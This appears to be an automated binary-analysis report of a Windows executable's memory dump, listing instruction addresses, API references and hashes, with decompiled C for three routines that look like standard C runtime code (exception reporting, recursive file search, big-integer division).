0x00000000
0x00000000
0x00000000
0x008330f5
0x00832950
0x00833039
0x00833039
0x00833043
0x00833051
0x00833057
0x00833057
0x00000000
0x00833043
0x00832956
0x00832959
0x008329ed
0x008329f5
0x00832a04
0x00832a08
0x00832a0b
0x00832a12
0x00832a1b
0x00832a1d
0x00832a21
0x00832a27
0x00832a2c
0x00832a38
0x00832a45
0x00832a52
0x00832a58
0x00832a5b
0x00832a68
0x00832a68
0x00832a68
0x00832a6a
0x00832a6c
0x00832a6c
0x00832a72
0x00832a75
0x00832a81
0x00832a81
0x00832a83
0x00832a83
0x00832a8e
0x00832a90
0x00832a95
0x00832a9b
0x00832aa1
0x00832aaa
0x00832aba
0x00832aba
0x00832aa3
0x00832aa3
0x00832aa5
0x00832aa5
0x00832abc
0x00832ad2
0x00832ad8
0x00832ae6
0x00832af1
0x00832afc
0x00832aff
0x00832b11
0x00832b1f
0x00832b2a
0x00832b3a
0x00832b48
0x00832b4b
0x00832b50
0x00832b53
0x00832b56
0x00832b59
0x00832b5c
0x00832b5e
0x00832b60
0x00832b62
0x00832b62
0x00832b60
0x00832b6b
0x00832b71
0x00832b77
0x00832bbc
0x00832bbc
0x00832bbf
0x00832bc9
0x00832bcb
0x00832bdd
0x00832bdd
0x00832be7
0x00832be7
0x00832bed
0x00832bef
0x00832bf9
0x00832bfe
0x00832c00
0x00832c02
0x00832c0c
0x00832c0c
0x00832bfe
0x00832c13
0x00832c16
0x00832c22
0x00832c22
0x00000000
0x00832c18
0x00832c18
0x00832c1b
0x00000000
0x00000000
0x00832c1f
0x00832c24
0x00832c24
0x00832c30
0x00832c30
0x00832c32
0x00832c38
0x00832c66
0x00832c6a
0x00832c6c
0x00832c6e
0x00832c6e
0x00832c6e
0x00832c71
0x00832c71
0x00832c7c
0x00832c82
0x00832c89
0x00832c8f
0x00832c91
0x00832c97
0x00832c9e
0x00832ca4
0x00832cab
0x00832cb1
0x00832cb1
0x00832cb7
0x00832cba
0x00832cbf
0x00832cc2
0x00832cc4
0x00832cc6
0x00832cc8
0x00832cc8
0x00832cd6
0x00832cdb
0x00832cdd
0x00832ce1
0x00832ce8
0x00832d69
0x00832d73
0x00832d7e
0x00832d81
0x00832d88
0x00832d8a
0x00832d8a
0x00832d8a
0x00832d8d
0x00832d8f
0x00832e91
0x00832d95
0x00832d9e
0x00832da1
0x00832db0
0x00832dba
0x00832dbe
0x00832dc5
0x00832dc7
0x00832dcd
0x00832dd4
0x00832ddd
0x00832de3
0x00832de4
0x00832df0
0x00832df4
0x00832dfa
0x00832dfc
0x00832e04
0x00832e0a
0x00832e0c
0x00832e16
0x00832e18
0x00832e23
0x00832e2b
0x00832e48
0x00832e58
0x00832e5e
0x00832e61
0x00832e6c
0x00832e74
0x00832e79
0x00832e7c
0x00832e7f
0x00832e82
0x00832e84
0x00832e86
0x00832e89
0x00832e89
0x00832e84
0x00832dd4
0x00832dc7
0x00832e9a
0x00832ea1
0x00832ea3
0x00832ea5
0x00832ea5
0x00832cea
0x00832cea
0x00832cec
0x00832cef
0x00832cf2
0x00832cf9
0x00832cfe
0x00832d0a
0x00832d0f
0x00832d12
0x00832d13
0x00832d14
0x00832d16
0x00832d29
0x00832d2e
0x00832d33
0x00832d33
0x00832d38
0x00832d38
0x00832d38
0x00832d3a
0x00832d3d
0x00832d3f
0x00832d41
0x00832d46
0x00832d4d
0x00832d4e
0x00832d4e
0x00832d56
0x00832d56
0x00832eac
0x00832eb3
0x00832ec1
0x00832ec1
0x00832ecf
0x00832ed4
0x00832edb
0x00832fbf
0x00832fe0
0x00832fe9
0x00832ff5
0x00832ffb
0x00833003
0x00833005
0x00833012
0x00833019
0x0083301e
0x00833022
0x0083302f
0x0083302f
0x00833022
0x00000000
0x00832ee1
0x00832ee4
0x00832ef2
0x00832efb
0x00832f04
0x00832f07
0x00832f09
0x00832f0b
0x00832f0e
0x00832f10
0x00832f13
0x00832f16
0x00832f18
0x00832f20
0x00832f22
0x00832f25
0x00000000
0x00000000
0x00832f2b
0x00832f30
0x00000000
0x00000000
0x00832f32
0x00832f34
0x00832f43
0x00832f43
0x00832f50
0x00832f55
0x00832f58
0x00832f5a
0x00832f5a
0x00832f5a
0x00832f5a
0x00832f5d
0x00832f5f
0x00832f62
0x00832f62
0x00832f65
0x00832f96
0x00832f96
0x00832f96
0x00832f9d
0x00832fa4
0x00832fa9
0x00832f67
0x00832f69
0x00832f6c
0x00832f6c
0x00832f6f
0x00832f72
0x00832f74
0x00832f81
0x00832f83
0x00832f89
0x00832f8b
0x00832f8e
0x00832f8e
0x00832f8e
0x00832f93
0x00000000
0x00832f93
0x00832fac
0x00832fac
0x00832fad
0x00832fb0
0x00832fb0
0x00832fb9
0x00832fbc
0x00000000
0x00832fbc
0x00832edb
0x00832c45
0x00832c47
0x00832c4c
0x00832c50
0x00832c52
0x00832c60
0x00832c62
0x00000000
0x00832c62
0x00832c54
0x00832c57
0x00000000
0x00000000
0x00832c5b
0x00000000
0x00832c5c
0x00832c16
0x00832bcd
0x00832bcf
0x00000000
0x00000000
0x00832bd1
0x00832bd3
0x00832bd5
0x00832bd5
0x00000000
0x00832b79
0x00832b79
0x00832b79
0x00832b7c
0x00832bb2
0x00000000
0x00832bb2
0x00832b7f
0x00832b7f
0x00832b82
0x00832ba6
0x00000000
0x00832ba6
0x00832b84
0x00832b84
0x00832b87
0x00832b9a
0x00832b9a
0x00000000
0x00832b9a
0x00832b89
0x00832b8c
0x00000000
0x00000000
0x00832b8e
0x00000000
0x00832b8e
0x00832b77
0x00832a77
0x00832a7a
0x00000000
0x00000000
0x00832a7e
0x00000000
0x00832a7e
0x00832a5d
0x00832a60
0x00000000
0x00832a62
0x00832a62
0x00832a64
0x00000000
0x00832a64
0x00832a60
0x0083295f
0x00832962
0x00000000
0x00832968
0x00832974
0x0083297c
0x00832984
0x00832993
0x0083299b
0x0083299e
0x008329a4
0x008329aa
0x008329b0
0x008329b2
0x008329bc
0x008329bc
0x008329c2
0x008329c9
0x008329d7
0x008329da
0x008329e0
0x008329e0
0x00000000
0x008329c9
0x00832962
0x008328ff
0x00832906
0x00000000
0x00000000
0x00000000
0x00832906
0x008328f6
0x008328f6
0x00000000
0x00832897
0x00832899
0x008331f1
0x008331f4
0x00833202
0x0083320d
0x0083320d
0x00832895
0x00832831
0x00832833
0x00000000
0x00832833
0x008327c1
0x008327c3
0x008327c5
0x008327cb
0x00000000
0x008327d7
0x008327d9
0x008327dd
0x008327e7
0x008327e9
0x008327f2
0x00000000
0x008327f4
0x00832804
0x00832815
0x0083281a
0x00000000
0x0083281a
0x008327f2

APIs

__EH_prolog.LIBCMT ref: 00832786
_strlen.LIBCMT ref: 00832D0A

Part of subcall function 00841006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0083B3AF,00000000,?,?,?,0004022A), ref: 00841022

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00832E61

Strings

CMT, xrefs: 00832E94

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: 66705fc3d32186154f100b299fdfc4b298dceade0e1709acab23929875172b70
Instruction ID: a7287bb2d16f199574c05accbc091d25366412c0fd33ec49aa4378455361e78d
Opcode Fuzzy Hash: 66705fc3d32186154f100b299fdfc4b298dceade0e1709acab23929875172b70
Instruction Fuzzy Hash: 3C62E0719002448FDF28DF68C885AEA3BE1FF94304F04457EED9ADB286DB749945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00857C57, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00857C57(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x86d668; // 0x14325215
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0084E690(_t41);
					_pop(_t62);
				}
				E0084E920(_t67,  &_v804, 0, 0x50);
				E0084E920(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x1b
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -785
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E0084E690(_t57);
				}
				return E0084E243(_v8 ^ _t70);
			}

0x00857c57
0x00857c57
0x00857c57
0x00857c57
0x00857c62
0x00857c67
0x00857c69
0x00857c71
0x00857c73
0x00857c76
0x00857c7b
0x00857c7b
0x00857c87
0x00857c9a
0x00857ca8
0x00857cae
0x00857cb4
0x00857cba
0x00857cc0
0x00857cc6
0x00857ccc
0x00857cd2
0x00857cd8
0x00857cde
0x00857ce5
0x00857cec
0x00857cf3
0x00857cfa
0x00857d01
0x00857d08
0x00857d09
0x00857d12
0x00857d18
0x00857d18
0x00857d1b
0x00857d21
0x00857d2e
0x00857d37
0x00857d40
0x00857d49
0x00857d57
0x00857d59
0x00857d5f
0x00857d6e
0x00857d7a
0x00857d7d
0x00857d82
0x00857d91

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00857D4F
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00857D59
UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00857D66

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: fb982f71ce1687862aad4f2aa463aba83fa41cb608bb80d7673a8bc27c976b1b
Instruction ID: 2fa2e647c618053ecc28e5ac2d162cd8b540406cdb71866ae4702e200427e306
Opcode Fuzzy Hash: fb982f71ce1687862aad4f2aa463aba83fa41cb608bb80d7673a8bc27c976b1b
Instruction Fuzzy Hash: 3631B27490122CABCB61DF68D98979DBBB8FF18311F5045EAE80CA7290E7709B858F45

Uniqueness

Uniqueness Score: -1.00%

Function 0085A02E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0085A02E(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E00857B91(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E0085DDC1(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E0085A26D(_a16, _t101, __eflags, _t111);
							E00857AC6(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E0085DDC1(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00857E31();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x86d668; // 0x14325215
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E0085DE10(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E0084E920(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0085A02E(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E00855070(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00859E86);
									}
								} else {
									_push(_t55);
									_t57 = E0085A02E(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E0085A02E(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E0084E243(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}

0x0085a033
0x0085a034
0x0085a037
0x0085a037
0x0085a03a
0x0085a03a
0x0085a03c
0x0085a03d
0x0085a046
0x0085a047
0x0085a04a
0x0085a04d
0x0085a052
0x0085a059
0x0085a05a
0x0085a05b
0x0085a05e
0x0085a068
0x0085a06b
0x0085a06c
0x0085a06e
0x0085a082
0x0085a082
0x0085a085
0x0085a08f
0x0085a094
0x0085a097
0x0085a099
0x00000000
0x0085a09b
0x0085a09f
0x0085a0a8
0x0085a0ae
0x00000000
0x0085a0b1
0x0085a070
0x0085a070
0x0085a076
0x0085a07b
0x0085a07e
0x0085a080
0x0085a0b7
0x0085a0b9
0x0085a0ba
0x0085a0bb
0x0085a0bc
0x0085a0bd
0x0085a0be
0x0085a0c3
0x0085a0c7
0x0085a0c9
0x0085a0cf
0x0085a0d6
0x0085a0d9
0x0085a0dc
0x0085a0dd
0x0085a0e0
0x0085a0e1
0x0085a0e4
0x0085a0e5
0x0085a106
0x0085a106
0x0085a108
0x00000000
0x00000000
0x0085a0ed
0x0085a0ef
0x0085a0f1
0x0085a0f3
0x0085a0f5
0x0085a0f7
0x0085a0f9
0x0085a104
0x00000000
0x0085a104
0x0085a0f9
0x0085a0f5
0x00000000
0x0085a0f1
0x0085a10a
0x0085a10c
0x0085a10f
0x0085a128
0x0085a128
0x0085a12a
0x0085a12d
0x0085a13d
0x0085a13f
0x0085a13f
0x0085a12f
0x0085a12f
0x0085a132
0x00000000
0x0085a134
0x0085a134
0x0085a137
0x00000000
0x0085a139
0x0085a139
0x0085a139
0x0085a137
0x0085a132
0x0085a145
0x0085a14d
0x0085a151
0x0085a15f
0x0085a164
0x0085a179
0x0085a17b
0x0085a181
0x0085a184
0x0085a1b6
0x0085a1b6
0x0085a1b8
0x0085a1bb
0x0085a1c1
0x0085a1c1
0x0085a1c8
0x0085a1e2
0x0085a1e2
0x0085a1f1
0x0085a1f6
0x0085a1f9
0x0085a1fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0085a1ca
0x0085a1ca
0x0085a1d0
0x0085a1d2
0x00000000
0x0085a1d4
0x0085a1d4
0x0085a1d7
0x00000000
0x0085a1d9
0x0085a1d9
0x0085a1e0
0x00000000
0x00000000
0x00000000
0x00000000
0x0085a1e0
0x0085a1d7
0x0085a1d2
0x00000000
0x0085a1fd
0x0085a205
0x0085a20b
0x0085a20d
0x0085a20d
0x0085a215
0x0085a21a
0x0085a222
0x0085a225
0x0085a227
0x0085a23b
0x0085a240
0x0085a186
0x0085a186
0x0085a18a
0x0085a192
0x0085a192
0x0085a192
0x0085a194
0x0085a197
0x0085a19a
0x0085a19a
0x0085a111
0x0085a114
0x0085a116
0x00000000
0x0085a118
0x0085a118
0x0085a11e
0x0085a123
0x0085a116
0x0085a1a7
0x0085a1b2
0x00000000
0x00000000
0x00000000
0x0085a080
0x0085a054
0x0085a056
0x0085a0b2
0x0085a0b6
0x0085a0b6
0x00000000

Strings

., xrefs: 0085A1C1

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: cba0c3a5e02236aff63a754092534667df5a7aa0f121f6e10b7f6ed8f0a4c462
Instruction ID: 90e2383bb6906c3ca739f258099209536438a89532dd8dcfde7975ed455b2668
Opcode Fuzzy Hash: cba0c3a5e02236aff63a754092534667df5a7aa0f121f6e10b7f6ed8f0a4c462
Instruction Fuzzy Hash: A0310571900609AFCB288E78CCC4EFA7BBDFB85315F104298FC19C7291E6719E488B61

Uniqueness

Uniqueness Score: -1.00%

Function 0085C100, Relevance: 3.5, APIs: 2, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0085C100(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E0084DDE0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00860E30(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E0084DE00(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E0084DE00(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
